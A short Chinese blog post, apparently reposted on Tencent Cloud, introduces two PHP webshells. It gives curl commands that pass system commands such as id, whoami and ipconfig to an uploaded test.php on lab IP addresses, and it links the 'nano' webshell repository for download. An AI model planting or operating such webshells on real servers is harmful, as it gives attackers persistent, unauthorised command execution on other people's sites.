2个不常见的php版webshell
0x01 介绍
Webshell是攻击者使用的恶意脚本,旨在升级并维护已经受到攻击的Web应用程序的持久访问。webshell其实就是以asp、aspx、php、jsp或者cgi等网页文件形式与网站服务器WEB目录下正常的网页文件混在一起,使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到长久持续控制网站服务器的目的。
0x02 详情
A、
上传wesbehll到网站,通过curl访问木马文件
Linux站点:
curl.exe http://192.168.0.105/test.php -d 1=id
curl.exe http://192.168.0.105/test.php -d 1=ifconfig
Windows站点:
curl.exe http://192.168.0.126/test.php -d 1=whoami
curl.exe http://192.168.0.105/test.php -d 1=ipconfig
B、
nano
ninja
上传wesbehll到网站,通过特定连接访问木马文件
下载地址:https://github.com/s0md3v/nano.git
如果感觉文章不错,分享让更多的人知道吧!
- 发表于:
- 原文链接:https://kuaibao.qq.com/s/20190126G0JGD800?refer=cp_1026
- 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
- 如有侵权,请联系 cloudcommunity@tencent.com 删除。
相关快讯
扫码
添加站长 进交流群
领取专属 10元无门槛券
私享最新 技术干货
腾讯云开发者
